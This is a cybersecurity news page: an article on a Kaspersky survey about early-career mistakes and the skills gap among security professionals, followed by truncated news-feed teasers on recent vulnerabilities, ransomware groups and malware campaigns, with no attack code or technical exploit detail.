With human error responsible for almost two-thirds of cyber incidents in the last two years, over 50% of current cybersecurity professionals acknowledge making mistakes in the early stages of their careers due to insufficient theoretical or practical knowledge. This acknowledgment becomes even more pronounced among those with two to five years of experience, with nearly 60% admitting to similar missteps. In the Middle East, Turkey, and Africa (META) region, 43% of all respondents concede to making such errors. According to a recent Kaspersky study, over the past two years organizations have suffered at least one cyber incident due to a lack of qualified cybersecurity staff. The Uphill Battle of Cybersecurity Hiring. While sourcing more qualified cybersecurity staff might be one of the solutions to this problem, businesses worldwide are facing a lack of information security (InfoSec) professionals. According to current estimates, the cyber-workforce shortfall totals nearly 4 million. The general cybersecurity skills gap is accompanied by the fact that many new starters in the industry must cope with gaps in practical and theoretical knowledge, resulting in initial struggles and errors in their job. Some of the most common mistakes made by InfoSec professionals in the META region early in their careers turned out to be using weak or guessable passwords (52%), a lack of identity protection (48%), and the use of outdated security measures (35%). Neglecting to perform backups of important data (34%) was also a common mistake cybersecurity experts made at the beginning of their careers. As cybersecurity professionals acknowledge they might not have had the required skillset and hands-on experience when entering the field, some point to additional difficulties with jump-starting their careers. Despite the cyber industry continuously reporting a workforce gap, 34% of respondents claim to have had three or more failed interviews before being selected for an InfoSec role. In the META region the process is smoother, with just 21% saying they needed to undergo interviews more than once or twice.
“It’s no secret that formal training programs often struggle to keep up with industry developments, and that is especially true for the cybersecurity field,” comments Marina Alekseeva, Chief Human Resources Officer at Kaspersky. “The fact that many employees in the market might have limited practical skills or gaps in their knowledge underlines the importance of a comprehensive onboarding process with a focus on peer learning and means companies must pay more attention to the upskilling of their employees,” Alekseeva added. Cyber Career Challenges and Resilience. The initial challenges cybersecurity experts face when they join the industry may explain why nearly half of InfoSec professionals (46%) globally and one in three (32%) in the META region say that it took them more than a year to feel comfortable in their first cybersecurity roles. While 31% of respondents managed to get to grips with their job within one or two years, 9% of respondents said the process took them two to three years and 6% said more than three years. In the META region the respective figures are 21%, 7% and 4%. The extensive list of factors contributing to cyber incidents highlights the myriad considerations that employees—particularly those outside the IT department—must bear in mind to minimize the likelihood of errors. For instance, the rise of shadow IT (11%) poses a growing concern for organizations as employees increasingly operate beyond the confines of traditional office spaces and are entrusted with remote devices, both for work and personal use. It’s worth noting that these causes are more often accidental than intentional. Only 8% of incidents stemmed from violations of information security policies by non-IT employees. However, the financial services sector stands out in this regard.
Violations of information security policies by non-IT staff in this industry account for 22% of cyber incidents, while 34% cite intentionally malicious behavior by both IT and non-IT employees as a notably more prevalent issue.
Technical specifics and a proof-of-concept (PoC) exploit have been made available for a recently disclosed critical security flaw in Progress Software OpenEdge Authentication Gateway and AdminServer, which could be potentially exploited to bypass authentication protections. Tracked as CVE-2024-1403, the vulnerability has a maximum severity rating of 10.0 on the CVSS scoring system. It
A financially motivated threat actor called Magnet Goblin is swiftly adopting one-day security vulnerabilities into its arsenal in order to opportunistically breach edge devices and public-facing services and deploy malware on compromised hosts. “Threat actor group Magnet Goblin’s hallmark is its ability to swiftly leverage newly disclosed vulnerabilities, particularly targeting
The threat actors behind the BianLian ransomware have been observed exploiting security flaws in JetBrains TeamCity software to conduct their extortion-only attacks. According to a new report from GuidePoint Security, which responded to a recent intrusion, the incident "began with the exploitation of a TeamCity server which resulted in the deployment of a PowerShell implementation of
As cyber threats loom around every corner and privileged accounts become prime targets, the significance of implementing a robust Privileged Access Management (PAM) solution can't be overstated. With organizations increasingly migrating to cloud environments, the PAM Solution Market is experiencing a transformative shift toward cloud-based offerings. One Identity PAM Essentials stands
Users in Brazil are the target of a new banking trojan known as CHAVECLOAK that's propagated via phishing emails bearing PDF attachments. "This intricate attack involves the PDF downloading a ZIP file and subsequently utilizing DLL side-loading techniques to execute the final malware," Fortinet FortiGuard Labs researcher Cara Lin said. The attack chain involves the use of
As the shift of IT infrastructure to cloud-based solutions celebrates its 10-year anniversary, it becomes clear that traditional on-premises approaches to data security are becoming obsolete. Rather than protecting the endpoint, DLP solutions need to refocus their efforts to where corporate data resides - in the browser. A new guide by LayerX titled "On-Prem is Dead. Have You Adjusted Your Web
Source: www.proofpoint.com – Author: 1 This week we are joined by Selena Larson from Proofpoint, who is discussing their research, “Bumblebee Buzzes Back in Black.” Bumblebee is a sophisticated downloader used by multiple cybercriminal threat actors and was a favored payload from its first appearance in March 2022 through October 2023 before disappearing. After a […] The post Research Saturday Podcast: The return of a malware menace. – Source: www.proofpoint.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.proofpoint.com – Author: 1 Organizations continue to race against cybercriminals to keep their systems secure by focusing on defensive measures, including addressing supply chain weaknesses, removing software vulnerabilities and exploring alternatives to traditional passwords. Ransomware remains the predominant attack approach they face. Last year’s record number of ransomware attacks included a 67% year-over-year increase […] The post Cyber defenses ramp up as hacks exploit gaps – Source: www.proofpoint.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: 1 Cyber Insurance, Fraud Management & Cybercrime, Geo Focus: The United Kingdom. Committee Chair Accuses UK of Favoring an ‘Ostrich Strategy’ for Ransomware. Akshaya Asokan (asokan_akshaya) • March 10, 2024. The U.K. Conservative government doesn’t favor a government-funded cyber insurance backstop. (Image: Shutterstock) The Conservative government of […] The post UK Conservatives Say ‘No’ to Cyber Insurance Backstop – Source: www.databreachtoday.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning, Leadership & Executive Communication, Next-Generation Technologies & Secure Development. Also: Palo Alto Networks’ Strategy Pivot; Massive Change Healthcare Cyberattack. Anna Delaney (annamadeline) • March 8, 2024. Clockwise, from top left: Anna Delaney, Tom Field, Michael Novinson, and Marianne Kolbasuk McGee. In […] The post ISMG Editors: Our Pledge to You in a New Era of Journalism – Source: www.databreachtoday.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Mayank Parmar YouTube is no longer showing recommended videos to users logged out of a Google account or using Incognito mode, making people concerned they are being bullied into always being signed into the service. This change, which is now rolling out, shows a simple YouTube homepage without any videos or […] The post YouTube stops recommending videos when signed out of Google – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Bill Toulas Image: Midjourney A financially motivated hacking group named Magnet Goblin uses various 1-day vulnerabilities to breach public-facing servers and deploy custom malware on Windows and Linux systems. 1-day flaws refer to publicly disclosed vulnerabilities for which a patch has been released. Threat actors looking to exploit these flaws must […] The post Magnet Goblin hackers use 1-day flaws to drop custom Linux malware – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.troyhunt.com – Author: Troy Hunt Let me begin by quoting Stefan during the livestream: “Turns out having tons of data integrity is expensive”. Yeah, and working with tons of data in a fashion that’s both fast and cost effective is bloody painful. I’m reminded of the old “fast, good and cheap – pick 2” […] The post Weekly Update 390 – Source: www.troyhunt.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.techrepublic.com – Author: TechRepublic Academy Published March 11, 2024 We may earn from vendors via affiliate links or sponsorships. This might affect product placement on our site, but not the content of our reviews. See our Terms of Use for details. One of the web’s biggest cybersecurity training resources, The Complete 2024 Cyber Security […] The post If your Business Needs Cybersecurity, you Should Become the Expert – Source: www.techrepublic.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Team Register Infosec in brief: Cybersecurity researchers informed Microsoft that the notorious North Korean hacking group Lazarus discovered the “holy grail” of rootkit vulnerabilities in Windows last year, but Redmond still took six months to patch the problem. Researchers at Avast said they informed Microsoft of a serious admin-to-kernel exploit in a […] The post Microsoft waited 6 months to patch actively exploited admin-to-kernel vulnerability – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.cybertalk.org – Author: slandau EXECUTIVE SUMMARY: AI is revolutionizing businesses worldwide. Enterprises are being reinvented through artificial intelligence. AI is also separating the industry leaders from the industry followers. In the U.S., 73% of companies have already adopted artificial intelligence. Within certain sectors, experts expect that, on an annual basis, AI could contribute $4.4 […] The post A strategic shift to AI-powered and cloud-delivered solutions – Source: www.cybertalk.org was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.schneier.com – Author: Bruce Schneier Comments: Flerfer • March 11, 2024 9:56 AM: I’ve been wondering if this could be used to help decrypt the Kryptos sculpture, considering that part of the phrase has been revealed to help move along a solution. Winter • March 11, 2024 11:01 AM: Not sure this is […] The post Using LLMs to Unredact Text – Source: www.schneier.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.cyberdefensemagazine.com – Author: Gary Securing Operational Technology. ACCESS THE RECORDING. Kick-start your OT security program, wherever you are in your journey. Gain industry-specific insights into OT cybersecurity challenges and equip yourself with practical strategies and best practices to enhance OT security. Shape the future of cyber resilience with us! Named Microsoft’s Security Impact Partner […] The post OT Security Q&A for Cybersecurity Leaders with Difenda and Microsoft – Source: www.cyberdefensemagazine.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.cyberdefensemagazine.com – Author: Stevin Attack Surface Management, Dark Web Monitoring, and Application Penetration Testing, by Dr. Ilia Kolochenko, CEO and Chief Architect, ImmuniWeb. ImmuniWeb SA is a global application security company headquartered in Geneva, Switzerland. The company has been profitable, cashflow positive and rapidly growing since its incorporation in 2019. The award-winning ImmuniWeb® AI Platform […] The post ImmuniWeb AI Platform – Source: www.cyberdefensemagazine.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.cyberdefensemagazine.com – Author: News team By Kevin Beasley, CIO, VAI. Increased competition and new regulatory requirements are increasing the tempo of digital transformation among mid-market companies. In fact, Deloitte’s 2023 Mid-Market Technology Trend report found that technology spending among this cohort is at its highest level since 2019. However, mid-market companies face cybersecurity challenges […] The post The Balancing Act for Mid-Market Firms: Navigating Digital Growth and Security Hurdles – Source: www.cyberdefensemagazine.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.cyberdefensemagazine.com – Author: News team By Ken Cox, President of Hostirian. Despite the technological advancements brought by automation and the enhanced capabilities of data analytics that have transformed decision-making processes, the digital age has proved to be a double-edged sword, with an unsettling rise in employee monitoring technologies on the other end of its […] The post The Ethics And Privacy Concerns Of Employee Monitoring: Insights From Data Privacy Expert Ken Cox – Source: www.cyberdefensemagazine.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.cyberdefensemagazine.com – Author: News team By Brett Raybould, EMEA Solutions Architect, Menlo Security. Phishing remains one of the most prevalent challenges facing organisations, with more than three billion malicious emails estimated to be sent around the world every day. No-one is immune to the threat of phishing. From aeronautics firms, major banks, and pharmaceutical […] The post Phishing Campaign Exploits Open Redirection Vulnerability In ‘Indeed.com’ – Source: www.cyberdefensemagazine.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.infosecurity-magazine.com – Author: 1 Security researchers have uncovered a trend involving the exploitation of 1-day vulnerabilities, including two in Ivanti Connect Secure VPN. The flaws, identified as CVE-2023-46805 and CVE-2023-21887, were quickly exploited by multiple threat actors, leading to various malicious activities. Tracking these exploits, the Check Point Research (CPR) team said it encountered […] The post Magnet Goblin Exploits Ivanti Vulnerabilities – Source: www.infosecurity-magazine.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.infosecurity-magazine.com – Author: 1 The BianLian threat actor has been observed shifting toward extortion-only activities, according to recent findings by GuidePoint’s Research and Intelligence Team (GRIT). Following Avast’s release of a decryptor for BianLian in January 2023, the group has altered its tactics. In a recent incident response, GRIT, in collaboration with GuidePoint’s DFIR […] The post BianLian Threat Actor Shifts Focus to Extortion-Only Tactics – Source: www.infosecurity-magazine.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: securityaffairs.com – Author: Pierluigi Paganini BianLian group exploits JetBrains TeamCity bugs in ransomware attacks. The BianLian ransomware group was spotted exploiting vulnerabilities in JetBrains TeamCity software in recent attacks. Researchers from GuidePoint Security noticed, while investigating a recent attack linked to the BianLian ransomware group, that the threat actors gained initial access to the target […] The post BianLian group exploits JetBrains TeamCity bugs in ransomware attacks – Source: securityaffairs.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.